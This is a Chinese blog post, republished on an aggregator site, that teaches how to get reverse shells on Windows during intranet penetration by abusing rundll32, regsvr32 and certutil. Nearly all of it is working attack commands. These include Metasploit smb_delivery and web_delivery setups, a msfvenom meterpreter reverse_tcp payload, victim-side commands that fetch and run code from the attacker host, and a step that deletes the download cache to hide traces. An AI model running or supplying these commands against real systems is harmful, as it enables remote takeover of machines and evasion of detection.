码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 内网渗透之Windows反弹shell(二)


    目录

    Windows反弹shell

    03Rundll32.exe

    04Regsvr32.exe

    05Certutil.exe


    Windows反弹shell

    03Rundll32.exe

    Rundll32.exe与Windows操作系统相关,它允许调用从DLL导出的函数(16位或32位),并将其储存在适当的内存库中。

    通过Metasploit的SMB Delivery模块发起Rundll32攻击

    use exploit/windows/smb/smb_delivery

    set srvhost 192.168.1.121

    exploit -j

    被控端执行

    rundll32.exe \\192.168.1.121\qFMnFO\test.dll,0

    反弹成功

    04Regsvr32.exe

    Regsvr32.exe是一个命令行应用程序,用于注册和注销OLE控件,如Windows注册表中的dll和ActiveX控件。
    Regsvr32.exe安装在Windows XP和Windows后续版本的 %systemroot%\System32 文件夹中。

    语法:Regsvr32 [/s][/u][/n][/i[:cmdline]]

    /u - 注销服务器

    /i - 调用Dllinstall传递一个可选的[cmdline];当它与/u一起使用时·它调用dll来卸载

    /n - 不要调用DllRegisterServer;此选项必须与/i一起使用

    /s - 沉默;不显示消息框

    通过msf的Web Delivery模块启动Regsvr32.exe

    use exploit/multi/script/web_delivery

    set srvhost 192.168.1.121

    set target 3

    set payload windows/x64/meterpreter/reverse_tcp

    set lhost 192.168.1.121

    exploit –j

    被控端执行

    regsvr32 /s /n /u /i:http://192.168.1.121:8080/yvj3GKJwvde.sct scrobj.dll

    反弹成功

    05Certutil.exe

    Certutil.exe是作为证书服务的一部分安装的命令行程序。 我们可以使用此工具在目计算机中执行恶意的exe文件以获得meterpreter会话。

    msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.121 lport=6666 -f exe > shell.exe

    python3 -m http.server

    certutil.exe -urlcache -split -f http://192.168.1.121:8000/shell.exe shell.exe

    ./shell.exe

    use exploit/multi/handler

    set payload windows/x64/meterpreter/reverse_tcp

    set lhost 192.168.1.121

    set lport 6666

    exploit

    清除日志

    certutil.exe -urlcache -split -f http://192.168.1.121:8000/shell.exe delete

  • 相关阅读:
    DRM系列(5)之vblank事件驱动
    Spring Web Flow入门(带详细注释)
    数据安全:前端用户登录信息加密的实现(基于RSA)
    Vue子组件传自定义事件给父组件
    视频基础学习一——色立体、三原色以及像素
    beyond compare如何设置只比较实际内容?(使用关联规则比较)
    js 什么时候必须使用[‘属性名‘] 的方式??
    【Python自学笔记】Python编程:使用sys和argparse配置和使用带参数的命令行
    李宏毅《机器学习》丨7. Conclusion(总结)
    Java操作Excel
  • 原文地址:https://blog.csdn.net/m0_63127854/article/details/125852487
  • 最新文章
  • 沪漂五周年了:我越来越迷茫了
    Agentic Skill Routing 实战:别再把所有 Skill 塞进 AI Agent 上下文
    MySQL-Seconds_behind_master的精度误差
    [MAF预定义ChatClient中间件-03]CachingChatClient——利用缓存省钱省时间
    AI的至暗历史:从万众期待到被政府撤资,AI的两次死亡徘徊
    Agent OS :五种驯服不确定性的范式
    PortSwigger SQL注入LAB11
    数据库即时编译JIT
    [Begin]AI Learn Data Day 0
    深度学习进阶(二十七)现代 LLM 的核心架构设计其二:SwiGLU
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
小工具 小游戏
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1

京公网安备 11010502049817号